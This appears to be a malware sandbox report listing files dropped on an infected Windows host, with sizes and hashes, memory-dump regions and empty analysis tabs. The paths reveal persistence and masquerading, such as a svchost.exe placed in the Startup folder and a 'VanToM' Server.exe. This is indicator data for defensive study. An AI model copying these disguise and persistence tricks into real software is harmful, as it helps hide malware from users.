9c4c52a147605beccfa89d9e31dd2e55171d6f65

SHA256
8e0b0ec4717c14d3e5bae7250dae6669d2bfc913c3d0e921e03f82b7da318b83

SHA512
f28cef091cacb7fb11d51a644fff0ac38c88cd0e7cfd47a434da0ed63a3bb247367c4068369f563222c049b381aca33c40491624ae0d1a37228988f60c98333d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
3d86a26ce443091861876855c210e20b

SHA1
f33e951d623194b4052a433995faa98330b1dc00

SHA256
6c725a20b837206ab2153dc27e16610ff12799da1b81f93af843ca893369b8de

SHA512
2f48755e705356a08fb6ede0cda8f54870c5e2b8aa83d041aea45c53e47f533bf65abec09345de13472964ab232b97db76dd1f8818d13933a3dafbd4e488a558

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58f4ea.TMP

Filesize
370B

MD5
73fd4dda4c5e4c5fa85315c25b3505f1

SHA1
5b3ecea4a093646d2b1efaedc5c2e28aaf0f353a

SHA256
30b659df94c9a244f4f6c3edfdb1a9518f4619c64c18c7fbd1acc547a82ef3cd

SHA512
abcf2a5af629b139ed97a6f6bb8c8a9f1cf365156bebc19648fa5fe243854ac845e11467bc35dd39c6b3686b2543d6cf661dc0d6e333e8a7416add7bc0dda4a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
be2aced393b12dee95b4fd4b88e2e9c4

SHA1
df27dfe9654c2938854612453e7803c13529add9

SHA256
aa0c304d1896847df51d0fda67d6b36aaf844ceff2d29be1e2f38b2e2e9b2e44

SHA512
4f79be1781f1b00d6743175b99e91884520cafcf1f1bc69389b512e8903b003e83ccdc4e9327e68d07b2c1602ab9be56ada9510a5bad74d027784eb269704c14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
57d6ca8737fe8af6102c325400576409

SHA1
06cb43a2bc0794dbd46f950d80a38827a8be07ea

SHA256
458fa0e8ed9ba997f782c5e157017c2fdf4780d4d065eae0d22e5d0730959a94

SHA512
4c845466bc9f00876a955b243343bf122c275de0e56f222e39bf869139608317c694755c44e8108c2d0e11daabae215627fb7735a2245835378cd16145d8171e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5d96f98602b1af327a007d82d2b4c468

SHA1
4a4711999f0d4782b6cc93693a58dd253809c06e

SHA256
5b5d517a45273a4764031c73720a3958d86efa053bb279180b34bfa06f6856ee

SHA512
87e2d1176bbc33b134cc1e433fa92fff6f4a505ba5ce3cfef24a7699a5f4cb7ba2291d377600722dded80488d7ff34f2cdfc9673b8914407bf8578c477dcfdd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8ddd85df313b9f1801dfd5e23a06bd99

SHA1
8ae4533a20e6b8cdbac4e66e635de94b29455141

SHA256
d64bef08e78e72f6867dc432529f4dcfb9a9a1b7e1851c48bbe08cca52eb2bc9

SHA512
570c12796f136cc7c1d1e6644aad5585a2cf371541843b71f01a1802a88498ece3d4fddd2a498cf06ec91d69f34fc50b53fd087aa7506072c7facd7b28e6528c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver4810.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GENTSNHI\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\AV.EXE

Filesize
1.1MB

MD5
f284568010505119f479617a2e7dc189

SHA1
e23707625cce0035e3c1d2255af1ed326583a1ea

SHA256
26c8f13ea8dc17443a9fa005610537cb6700aebaf748e747e9278d504e416eb1

SHA512
ebe96e667dfde547c5a450b97cd7534b977f4073c7f4cbc123a0e00baaefeb3be725c1cafbfb5bb040b3359267954cd1b4e2094ef71fc273732016ee822064bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\AV2

Filesize
208B

MD5
1eb42a46528ac2c7cfabdeec3af950e5

SHA1
366bfb9336554488c46942d2b95f808e883282ea

SHA256
14ca42c6791ce9ce0b7fe18ea618d3ad3a77c9cfc39ac3e938e835ddae78292a

SHA512
3796bde665409ed201d3bef2e2a6afd4bfd207f647ef7e7ddc5570a3d9f481ad758df3abae7b431b42e4f944ae275d04678edf0e011c0db81c0081680afbd85d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AV2.EXE

Filesize
368KB

MD5
014578edb7da99e5ba8dd84f5d26dfd5

SHA1
df56d701165a480e925a153856cbc3ab799c5a04

SHA256
4ce5e8b510895abb204f97e883d8cbaacc29ccef0844d9ae81f8666f234b0529

SHA512
bd5159af96d83fc7528956c5b1bd6f93847db18faa0680c6041f87bbebef5e3ba2de1f185d77ff28b8d7d78ec4f7bd54f48b37a16da39f43314ef022b4a36068

Download Submit
C:\Users\Admin\AppData\Local\Temp\DB.EXE

Filesize
243KB

MD5
c6746a62feafcb4fca301f606f7101fa

SHA1
e09cd1382f9ceec027083b40e35f5f3d184e485f

SHA256
b5a255d0454853c8afc0b321e1d86dca22c3dbefb88e5d385d2d72f9bc0109e6

SHA512
ee5dfa08c86bf1524666f0851c729970dbf0b397db9595a2bae01516299344edb68123e976592a83e492f2982fafe8d350ba2d41368eb4ecf4e6fe12af8f5642

Download Submit
C:\Users\Admin\AppData\Local\Temp\EN.EXE

Filesize
6KB

MD5
621f2279f69686e8547e476b642b6c46

SHA1
66f486cd566f86ab16015fe74f50d4515decce88

SHA256
c17a18cf2c243303b8a6688aad83b3e6e9b727fcd89f69065785ef7f1a2a3e38

SHA512
068402b02f1056b722f21b0a354b038f094d02e4a066b332553cd6b36e3640e8f35aa0499a2b057c566718c3593d3cea6bbabd961e04f0a001fd45d8be8e1c4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB.EXE

Filesize
149KB

MD5
fe731b4c6684d643eb5b55613ef9ed31

SHA1
cfafe2a14f5413278304920154eb467f7c103c80

SHA256
e7953daad7a68f8634ded31a21a31f0c2aa394ca9232e2f980321f7b69176496

SHA512
f7756d69138df6d3b0ffa47bdf274e5fd8aab4fff9d68abe403728c8497ac58e0f3d28d41710de715f57b7a2b5daa2dd7e04450f19c6d013a08f543bd6fc9c2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SB.EXE

Filesize
224KB

MD5
9252e1be9776af202d6ad5c093637022

SHA1
6cc686d837cd633d9c2e8bc1eaba5fc364bf71d8

SHA256
ce822ff86e584f15b6abd14c61453bd3b481d4ec3fdeb961787fceb52acd8bd6

SHA512
98b1b3ce4d16d36f738478c6cf41e8f4a57d3a5ecfa8999d45592f79a469d8af8554bf4d5db34cb79cec71ce103f4fde1b41bd3cce30714f803e432e53da71ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vubiqjug.3dc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut5876.tmp

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut8183.tmp

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcapi.dll

Filesize
385KB

MD5
1ce7d5a1566c8c449d0f6772a8c27900

SHA1
60854185f6338e1bfc7497fd41aa44c5c00d8f85

SHA256
73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf

SHA512
7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
2KB

MD5
6092202b16b631493aad4581d4b7e09e

SHA1
4d017163674a29a1e988db6ec0fc81212069847c

SHA256
ca19d0e014449896a3572ed32a08b10483c338b02a16ac40ba6cb8a83fcd44f3

SHA512
512f883dd05a532d2d89f923b0ccab4682d78d878fbeecc63a59d1e88fe863777427d86c5b8e2d79fcbc808e1d0eac0f7d525b268258d1705db7fe7f321984e5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
468B

MD5
dd408abfb9ba280d3fdcc2febbbe9933

SHA1
2f5e5ce9725310be968f5cfcbc56d6617c1869de

SHA256
950387a35b692c2f2ab7471d4b08a0c5624c7452dee0e4a13ed92eaf80beebea

SHA512
09dd2ba0a9f8974f156ac0569229d6a5bcb476137019edb1ccafab1a7d3685245803babd4fa3d7946346fff7256dd819367a1b1cb14f8177dbf86f3b9dfc5dd0

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
468B

MD5
a4e3a104136a64b6e0e6568b5dc24d48

SHA1
a67b0acee5128da84dfb195f1bfe315439fc4729

SHA256
36df6f527543b990bcfd1603e818dc1e9efbd43fa285fb768f6d60868d1e4580

SHA512
4d9c6d6e1c01aa4557bb9d1c4e6d9e8d9656c9190aa73ab552eb1a52dd76b02d7a6275f595d5b7d1cd6fbd8896b84a469dbd31011cbcbd2e96bf1c213152ce7d

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
766B

MD5
66370bc7bb3636ddd9a67b384d1c43ee

SHA1
e26218af36f064244b58270dd653d45f9b6a13ac

SHA256
852cc44956f3b34d955e024b38719a70a6c3d2489be54472c1728a89541d9632

SHA512
435fe4941b577c4c455078a633f5e6fd897f471f642032f5307acc852b64b49fbf2b2790b3d62f3fd8365e5b8058b00a900257eb2e3bfce214e71a03466a21b8

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
58d143dfc4f618b35dd3d564b43cb837

SHA1
bc202102b4f00f894fdb0d7e45f1b1fb13e7e3d0

SHA256
66be9be8011d45c47da3ff1012787480b9a31f9f33338b42aad723d75a1da69e

SHA512
828b82f63969a50436b032a9239094aaf239d11ce34297067471e30190c5dc440599a1c3d66b8a3da9e575417f89c5ee1ced9f6098f256fc447956c44ace073f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
64060573b27cf3da83963ac62256d69e

SHA1
1b380d898dc2679037a6c4d6fdbae3cf836d7803

SHA256
618cd71030c8d3c2fce2bce6149f9844a6a77a0cdf5c057f98647e06a2326071

SHA512
10d3e4822a25efa75810464b0ac985872ada6fecb1954485e4a14df9b98b6fbc4769dfab8c84228db8570db96bf3839544035e45ca5dcd5037dc295eaea43249

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
3KB

MD5
f1114a2eb784950ba1917938b9cfd93a

SHA1
5e60958550630a1605907608f3f91ee3962b3714

SHA256
d83d742d84eca38b5fc6054d5ad05b2478007dd27b4e8ac009d4cd1e30f5e4c4

SHA512
26da6ed6241be36f1795c27a322aca8996465938f0f886817fdc4fcdad12fa881ac519a72b6e6e4b3fadddd3575b6c9552259b14f044ec7c3d43f81890d6cf06

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
3KB

MD5
25aa0486403b994cf4a8d692b94bfaba

SHA1
8d30bd9796fe21002ac056cfb9c0a5c058d0c59f

SHA256
6347a2e858874906151d2b7fdc96810f50c9205ac8bc011f79125373b88d76ba

SHA512
266c660dcd683112785f98971b26703002248d187766e2e206919215b9690510854f8810427dad8dfdd6b5f7cef241b7ccc058d98461b9be801444724c1b5d6d

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
3KB

MD5
7d868174e6fcf762a67b42cf66b98e22

SHA1
97c960a10c8305955f2f2d8d3f20d94fbf979666

SHA256
39a3d1990afd7539f62b6c5a51b6663decc7c20cabb5f2e61ed13c7ba9a28bdf

SHA512
4f1b26aa6fb7af204f2dabe78db0402332a5dd3c96c0a01e55bf5987282b94c6ac655142f2d1cc0b0f961ce3c36afc5f697fd55b34be54047240d38ea3af5c8e

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
4KB

MD5
70bb3a083c463bbca271903424a3e536

SHA1
c8c763245577d652ebde1d404017484a05466f82

SHA256
d7cde5a9417fe33a1718b04d40f247bd27226c41b8320490b7e45a8c382a691f

SHA512
24bc2563fd8fb1236a5501471c627fe7563af062751204012933fbe6f6ec1b9a5834e24b59d53610387fdd9e0c993634976068578edae90fdc0ce2d92244620f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
4KB

MD5
d45bf3e960d497798211d11e160f4fad

SHA1
282e3d107d703d8ea094aeffdc1495c6673805b0

SHA256
d22ddc1552dcb6d50ffe24524a1e1546582f8d020039fd5c0cc89630b97b35a8

SHA512
51d02b57dc6edc892dfb83dffe4f5657ba5121e9fdc048b4b257f8cde583658cbe3225ff6b803aec3d84b7219118f89e4edbba9fbe8d86c3a1d2b6226f94ba7b

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
7KB

MD5
ae60d863f5c59a5b5f028fb45d081fbf

SHA1
3491aa02c221aecfaeee3ebdab11d66c48946478

SHA256
5380e9055adf464152b9e0340a1b82660e95babf2a9f95b998112c0905a42622

SHA512
cd3e35988ace5a3bd1ee3f9ce2ebb7f2efc29bd9d1a5c412d23081915a9adff55f2851439eb488316197d2fd3021b9e40babc0c9b011945e524ad92c2e62fd8d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2412658365-3084825385-3340777666-1000\0f5007522459c86e95ffcc62f32308f1_dd06e985-ac7f-4567-b0c7-3752f03c29fc

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms

Filesize
3KB

MD5
c002e3ed679ba59d60c2b7e6fe0acd5d

SHA1
d84146c18ed1ec4a275f54973df92bfc05195d51

SHA256
9bdbf879e93bc6f9ed75607d952951a9268910392bb28fbbdaa6c3f3501c1179

SHA512
13718d347b7f5b4610ed871bd64f992e5c50d6e6afd97b25a2f0f280c62c21dba05ad3cf0b410b6de00d4cecb1b8d7ca5125bc9c43cb9a287b3d1d65b07beb12

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms

Filesize
3KB

MD5
90a2d79ad22b3a88bc071b05890ebb9b

SHA1
a1519eae47e6b4d9173465a9fd428276572bf2a0

SHA256
569a8b19a6548e7dcf124406333d1dbcf8025bafbb5a6a47015f97b4dd538a87

SHA512
da4f1418e122d20ff07a311032c067f3ff119b0382a681064b33b8c3f4b4a973d55654f40eb2bd140770d363e9ed0049faa51cdad82ea1c587a0ef1874ae498a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OL5B4DAWDPIGYJOEZO3M.temp

Filesize
3KB

MD5
1c9176981443772b46f5f82c3d241a83

SHA1
c228f076a730357ce9d3ff14873d706b9b7f7fc0

SHA256
d27c9cb779a3af44e0d053f07264c1ac9082d5b93060bcdcba2a81d73f6a4abe

SHA512
1d77dfe6286a0036ec2913cdbd5f9062b05ed14b85975ff059b9d1aafab0aa38e4b1157d9924319b89569744dd022f1552752afac315be58c2040109d0fd8e28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
765add68c9d2b58e6cb43a685bd6db81

SHA1
b4013fafeaa5af5be8ceeadd5f4bff127b1261cc

SHA256
d16a677a1dd4a8fb3d2febb67e216e348fb9d50f7fa6e2bdbdd3d0716fabf4ce

SHA512
aee247f507778d74cdefd31743f9f148952763ac807f9d63ecb5b5a1c9e56f2ca96a76c60ccf28d517009d805aaa4795477d57c4699ce3ec8e9a9d7acb25ed71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe

Filesize
4.0MB

MD5
1d9045870dbd31e2e399a4e8ecd9302f

SHA1
7857c1ebfd1b37756d106027ed03121d8e7887cf

SHA256
9b4826b8876ca2f1378b1dfe47b0c0d6e972bf9f0b3a36e299b26fbc86283885

SHA512
9419ed0a1c5e43f48a3534e36be9b2b03738e017c327e13586601381a8342c4c9b09aa9b89f80414d0d458284d2d17f48d27934a6b2d6d49450d045f49c10909

Download Submit
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe

Filesize
183KB

MD5
3d4e3f149f3d0cdfe76bf8b235742c97

SHA1
0e0e34b5fd8c15547ca98027e49b1dcf37146d95

SHA256
b15c7cf9097195fb5426d4028fd2f6352325400beb1e32431395393910e0b10a

SHA512
8c9d2a506135431adcfd35446b69b20fe12f39c0694f1464c534a6bf01ebc5f815c948783508e06b14ff4cc33f44e220122bf2a42d2e97afa646b714a88addff

Download Submit
C:\Users\Admin\Desktop\Explorer.pif

Filesize
89KB

MD5
e79d0b1a342712ea9b96104086149d65

SHA1
a10177aafebb035e104eb22d30bdacb3894e0e1e

SHA256
e68ebecd17bb8e91079bd4fe9bd24059a2bc007b4baac477127eda7c5d5c6706

SHA512
f8cf1b773024784fe28f29af2200ad1d8f333b0dc251a1d39bef5a988c0c08c24328a6d9bbeea0370454c46c76835887f4792a55ec4f21608fa60b26977f27bf

Download Submit
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 1.exe

Filesize
80KB

MD5
cbcd34a252a7cf61250b0f7f1cba3382

SHA1
152f224d66555dd49711754bf4e29a17f4706332

SHA256
abac285f290f0cfcd308071c9dfa9b7b4b48d10b4a3b4d75048804e59a447787

SHA512
09fdcb04707a3314e584f81db5210b2390f4c3f5efa173539f9d248db48ae26b3a8b240cf254561b0ecb764f6b04bb4c129832c6502d952d1960e443371ce2a9

Download Submit
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\tsa.crt

Filesize
1010B

MD5
6e630504be525e953debd0ce831b9aa0

SHA1
edfa47b3edf98af94954b5b0850286a324608503

SHA256
2563fe2f793f119a1bae5cca6eab9d8c20409aa1f1e0db341c623e1251244ef5

SHA512
bbcf285309a4d5605e19513c77ef077a4c451cbef04e3cbdfec6d15cc157a9800a7ff6f70964b0452ddb939ff50766e887904eda06a9999fdedf5b2e8776ebd2

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 453242.crdownload

Filesize
4.8MB

MD5
ecae8b9c820ce255108f6050c26c37a1

SHA1
42333349841ddcec2b5c073abc0cae651bb03e5f

SHA256
1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069

SHA512
9dc317682d4a89351e876b47f57e7fd26176f054b7322433c2c02dd074aabf8bfb19e6d1137a4b3ee6cd3463eaf8c0de124385928c561bdfe38440f336035ed4

Download Submit
C:\Windows\System32\catroot2\dberr.txt

Filesize
20KB

MD5
72e921279bab1548afe9ade77fd99fea

SHA1
ea33ad6d4aa30e516186e3665c4430ebfb1e6baf

SHA256
b8428d15a92088a9ca4c354a3961fcc5420b4f911c40bb9278693f84fdf2bb6c

SHA512
30c591914a5dfc315145af887d43d1477c3c0097ff3d32fd65a998621afdd36c328ee322d54f5baed8f6eaf853272bf4525821dc234050995d9b9f6839d49c9b

Download Submit
memory/2008-2334-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2008-2645-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2008-1962-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2020-76459-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-90241-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2172-2370-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2172-2649-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2172-2338-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2172-1981-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2492-118029-0x0000000000CA0000-0x0000000000D8C000-memory.dmp

Filesize
944KB

Download
memory/2492-108636-0x0000000000CA0000-0x0000000000D8C000-memory.dmp

Filesize
944KB

Download
memory/2492-134886-0x0000000000CA0000-0x0000000000D8C000-memory.dmp

Filesize
944KB

Download
memory/2928-2356-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2928-2650-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2928-2395-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/2928-2371-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2337-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-1985-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2648-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2653-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2393-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2369-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2358-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2669-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2030-0x0000000004FC0000-0x0000000004FDB000-memory.dmp

Filesize
108KB

Download
memory/3404-2026-0x0000000004FC0000-0x0000000004FDB000-memory.dmp

Filesize
108KB

Download
memory/3404-2419-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/3404-2029-0x0000000004FC0000-0x0000000004FDB000-memory.dmp

Filesize
108KB

Download
memory/4420-1963-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4420-2335-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4420-2646-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4464-113892-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4464-113350-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4724-2647-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4724-2667-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4724-1982-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/4724-2336-0x0000000000350000-0x00000000017FF000-memory.dmp

Filesize
20.7MB

Download
memory/6264-34937-0x0000000005AE0000-0x0000000006084000-memory.dmp

Filesize
5.6MB

Download
memory/6264-62080-0x00000000067B0000-0x00000000067D2000-memory.dmp

Filesize
136KB

Download
memory/6264-42418-0x0000000006760000-0x00000000067A4000-memory.dmp

Filesize
272KB

Download
memory/6264-34523-0x0000000000C10000-0x0000000000C62000-memory.dmp

Filesize
328KB

Download
memory/6264-34560-0x0000000002D20000-0x0000000002D34000-memory.dmp

Filesize
80KB

Download
memory/6264-42410-0x00000000063A0000-0x00000000063A8000-memory.dmp

Filesize
32KB

Download
memory/6264-42118-0x0000000005AD0000-0x0000000005AD8000-memory.dmp

Filesize
32KB

Download
memory/6264-42119-0x0000000006270000-0x0000000006302000-memory.dmp

Filesize
584KB

Download
memory/6820-52811-0x000000001CB80000-0x000000001CBCC000-memory.dmp

Filesize
304KB

Download
memory/6820-52742-0x0000000001750000-0x0000000001758000-memory.dmp

Filesize
32KB

Download
memory/6820-57062-0x000000001EE70000-0x000000001F17E000-memory.dmp

Filesize
3.1MB

Download
memory/6820-51878-0x000000001CA70000-0x000000001CB0C000-memory.dmp

Filesize
624KB

Download
memory/7008-113360-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/8892-50007-0x000000001B5D0000-0x000000001BA9E000-memory.dmp

Filesize
4.8MB

Download
memory/8892-50009-0x000000001BB50000-0x000000001BBF6000-memory.dmp

Filesize
664KB

Download
memory/8892-50076-0x000000001BCC0000-0x000000001BD22000-memory.dmp

Filesize
392KB

Download
memory/8980-105141-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/10728-110468-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/11332-56851-0x00000000053E0000-0x00000000053E8000-memory.dmp

Filesize
32KB

Download
memory/11332-56852-0x00000000063C0000-0x000000000645C000-memory.dmp

Filesize
624KB

Download
memory/11332-55292-0x0000000000CE0000-0x0000000000D36000-memory.dmp

Filesize
344KB

Download
memory/11332-56853-0x0000000005D10000-0x0000000005D38000-memory.dmp

Filesize
160KB

Download
memory/11788-101233-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/11788-105182-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/12460-117164-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download
memory/12792-65397-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/12792-62015-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/14772-105138-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/14772-135140-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/14772-89601-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/15184-118191-0x000002B29E900000-0x000002B29E922000-memory.dmp

Filesize
136KB

Download
memory/15912-105173-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/18384-118030-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/19560-102484-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

